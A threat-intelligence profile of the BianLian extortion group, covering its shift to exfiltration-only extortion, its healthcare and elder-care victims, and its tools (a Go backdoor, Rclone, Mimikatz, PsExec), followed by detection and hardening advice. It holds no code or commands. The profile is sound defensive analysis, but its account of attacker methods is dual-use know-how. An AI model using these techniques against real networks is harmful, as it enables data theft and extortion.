BianLian

Background

BianLian ransomware emerged in mid-2022, initially following the conventional ransomware playbook of encrypting victim data and demanding payment for decryption. A significant operational pivot occurred in January 2023 when Avast released a free decryptor for BianLian's encryption scheme — a public decryptor development typically signals a flaw or key recovery in the ransomware's cryptographic implementation. In response, BianLian pivoted almost entirely to exfiltration-only extortion: rather than encrypting data, the group focuses on stealing sensitive data and threatening to publish it unless ransom is paid.

This exfiltration-only model offers operational advantages for the attacker: it eliminates the need for a functional encryption/decryption pipeline, reduces noise on victim systems (no mass file encryption event triggering EDR alerts), and can generate equivalent ransom pressure through the threat of data exposure alone — particularly effective against healthcare and legal sector victims where data privacy obligations create strong payment incentives.

BianLian is assessed to be a Russia-based threat group, based on operational patterns, language artifacts in code, and targeting preferences that avoid Commonwealth of Independent States (CIS) countries. The group likely comprises experienced ransomware operators with backgrounds in the broader Russian cybercrime ecosystem. CISA, the FBI, and the Australian Signals Directorate (ASD) issued a joint advisory in May 2023 warning critical infrastructure operators about BianLian's evolving extortion tactics.

Notable Campaigns

Retirement Living and Elderly Care Targeting (2022-2023) — BianLian specifically targeted assisted living facilities, retirement communities, and elderly care organizations. The targeting of organizations serving vulnerable populations was noted in CISA's advisory as an aggravating factor, with stolen data including medical records, financial information, and personally identifiable information of elderly individuals who face disproportionate harm from identity theft.

Air Canada Breach (2023) — BianLian claimed an attack against Air Canada, Canada's largest airline, claiming to have obtained 210 gigabytes of data including technical, operational, and employee information. Air Canada acknowledged unauthorized access while disputing the scope of the claimed data theft.

Healthcare Sector Sustained Targeting (2022-2024) — BianLian conducted numerous attacks against U.S. healthcare organizations including hospitals, physician practices, and healthcare technology companies. Healthcare targets are particularly susceptible to exfiltration-only extortion due to HIPAA breach notification requirements and the sensitive nature of medical records.

Australian Financial Services (2023-2024) — The Australian Signals Directorate specifically highlighted BianLian's targeting of Australian financial services and professional services firms. Several Australian organizations reported BianLian incidents involving exfiltration of client financial records and internal business data.

Tactics, Techniques & Procedures

RDP and VPN Credential Compromise — BianLian's primary initial access vector is exploiting compromised Remote Desktop Protocol credentials obtained through brute force, credential stuffing, or purchased initial access (T1133, T1078). The group maintains access for extended reconnaissance periods before acting — sometimes remaining on networks for weeks before initiating exfiltration.

Go-Based Custom Backdoor — BianLian deploys a custom Go-based backdoor for persistent access, using TCP reverse shells and SOCKS5 proxies for C2. The Go language's cross-compilation capabilities allow deployment across Windows and Linux environments. ProxyChains routes traffic through multiple proxy layers to conceal attacker infrastructure.

Exfiltration-Only Extortion Model — Rather than encrypting data, BianLian uses Rclone and similar tools to exfiltrate large volumes of sensitive data to attacker-controlled infrastructure (T1048, T1567.002). The group publishes victim names on its Tor leak site, threatening to release increasingly sensitive data tranches to create escalating pressure. Partial data releases — releasing some data while threatening more — are used as negotiating tactics.

Long Dwell Time Reconnaissance — BianLian typically spends significant time (days to weeks) mapping victim networks before acting. The group uses SoftPerfect Network Scanner for network discovery, Mimikatz for credential harvesting, and identifies backup systems, file servers, and data repositories before beginning exfiltration. This thorough reconnaissance enables highly targeted data theft focused on the most sensitive and valuable organizational data.

Tools & Malware

• BianLian Go Backdoor — A custom Go-compiled backdoor providing TCP reverse shell access, SOCKS5 proxy capability, and file transfer. Uses encrypted communications and can be compiled for multiple operating systems. Provides persistent C2 independent of initially compromised credentials.
• Ngrok — A legitimate tunneling service used to expose internal systems and services through encrypted tunnels, facilitating access to internal systems without direct inbound connections.
• Rclone — The primary data exfiltration tool, configured to upload stolen data to attacker-controlled storage. Executed with configuration files dropped to temporary locations.
• SoftPerfect Network Scanner — Commercial network scanning tool used for internal network discovery, service enumeration, and target identification.
• ProxyChains — Linux command-line tool used to route traffic through multiple proxy servers, obscuring attacker IP addresses during operations.
• PsExec — Legitimate Sysinternals tool used for remote command execution and lateral movement across Windows networks.
• PuTTY — SSH client used for Linux system access and tunneling during lateral movement operations.
• AnyDesk — Legitimate remote access software installed for persistent interactive access to key compromised systems.

Indicators & Detection

RDP Exposure Reduction — BianLian's primary initial access vector is RDP. Eliminate direct RDP exposure to the internet entirely — place RDP behind VPN with MFA. Monitor all RDP authentication for brute force patterns (multiple failures followed by success). Implement account lockout policies for RDP. Use RDP gateways to centralize and audit all RDP access.

Go Malware Detection — BianLian's Go backdoor can be detected through network signatures for Go-compiled binaries establishing persistent outbound TCP connections. Monitor for processes establishing long-lived TCP connections to external IPs on non-standard ports. Go binary artifacts in temporary directories or paths mimicking system utilities indicate potential BianLian deployment.

Exfiltration Monitoring — Implement data loss prevention controls monitoring for large-scale file access and transfer patterns. Alert on Rclone execution and configuration file creation. Monitor for bulk access to file shares containing sensitive data (medical records, financial data, legal documents) from systems that do not normally access these locations. Cloud egress monitoring should flag large data uploads to cloud storage providers.

Breach Notification Preparedness — Given BianLian's targeting of sectors with mandatory breach notification requirements (healthcare, finance), organizations should maintain current data maps identifying where sensitive data resides, develop breach notification procedures, and identify legal counsel and breach notification service providers in advance of incidents. Early preparation significantly reduces the legal and regulatory pressure that drives ransom payment.